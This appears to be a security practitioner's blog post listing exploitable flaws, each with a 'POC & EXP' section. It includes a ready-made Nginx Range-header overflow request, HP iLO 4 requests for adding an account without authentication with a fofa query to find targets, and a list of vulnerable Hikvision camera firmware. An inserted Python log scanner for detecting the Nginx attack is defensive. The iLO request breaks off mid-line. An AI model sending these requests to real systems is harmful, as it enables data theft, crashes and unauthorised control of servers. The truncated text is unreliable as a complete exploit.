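Principle: An integer overflow vulnerability exists in the Nginx range filter module. It allows a remote attacker to submit a specially crafted request to obtain sensitive information or crash the application.
Affected versions: Nginx < 1.13.2
Impact: Retrieval of cached HTTP requests, or an application crash.
POC & EXP
Manual:
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Range: bytes=-17208,-9223372036854758792
A status code of 206 indicates that the vulnerability is present.
Script: https://github.com/en0f/CVE-2017-7529_PoC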
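
A log-side check for the Range header shown in the Nginx entry above, as an added example that is not part of the original post: it flags requests whose suffix lengths are implausibly large or, across multiple ranges, sum past the signed 64-bit limit, as the page's header does. The log format, the 1 TiB threshold and the sample lines are assumptions constructed for illustration.

```python
import re

INT64_MAX = 2**63 - 1
MAX_PLAUSIBLE_BODY = 1 << 40  # assumption: nothing served is larger than 1 TiB
SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")
LINE = re.compile(r'^(\S+) (\d{3}) "([^"]*)"$')  # assumed log_format: $remote_addr $status "$http_range"

SAMPLE_LOG = [  # constructed lines, not real traffic
    '192.0.2.10 206 "bytes=0-1023"',
    '192.0.2.11 206 "bytes=-500"',
    '192.0.2.12 206 "bytes=-17208,-9223372036854758792"',
    '192.0.2.13 416 "bytes=-17208,-9223372036854758792"',
    '192.0.2.14 200 "-"',
]

def parse_range(header):
    """Return [(start, end)] with None for an absent bound, or None if malformed."""
    unit, sep, specs = header.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return None
    ranges = []
    for spec in specs.split(","):
        m = SPEC.match(spec)
        if not m or not (m.group(1) or m.group(2)):
            return None
        ranges.append(tuple(int(g) if g else None for g in m.groups()))
    return ranges

def assess_range(header):
    """Return the reasons a Range header looks like an overflow attempt."""
    ranges = parse_range(header)
    if ranges is None:
        return ["malformed"]
    suffixes = [end for start, end in ranges if start is None]
    reasons = []
    if any(s > MAX_PLAUSIBLE_BODY for s in suffixes):
        reasons.append("oversized-suffix")
    if len(ranges) > 1 and sum(suffixes) > INT64_MAX:
        reasons.append("suffix-sum-exceeds-int64")
    return reasons

def scan(lines):
    """Return (ip, status, reasons) for each line with a suspicious Range ("-" = no header)."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if m and m.group(3) != "-" and (reasons := assess_range(m.group(3))):
            hits.append((m.group(1), int(m.group(2)), reasons))
    return hits
```

A flagged line with status 206 is the response the entry above describes as indicating a vulnerable server.
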
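
Principle: Unauthorized access. The add-user operation does not verify the identity of the operator, so an unauthenticated user can add an account.
Affected versions: iLO 4 firmware 2.xx versions below 2.54
Impact: Full access to the web panel; the host can then be controlled through the remote control software bundled with HP iLO. Download address: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8
POC & EXP
fofa:
title="iLO"
Manual:
# POC
GET /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json
# EXP
POST /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
C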

Principle: Classic unauthorized access. Sensitive paths do not verify the identity of the requester, which leads to unauthorized access.
Affected versions:
DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530
DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401
DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125
DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414
DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421
DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928
DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106
Impact: Sensitive camera information that can be obtained: username, camera snapshot, camera user configuration

Equinox
A cybersecurity practitioner who enjoys sharing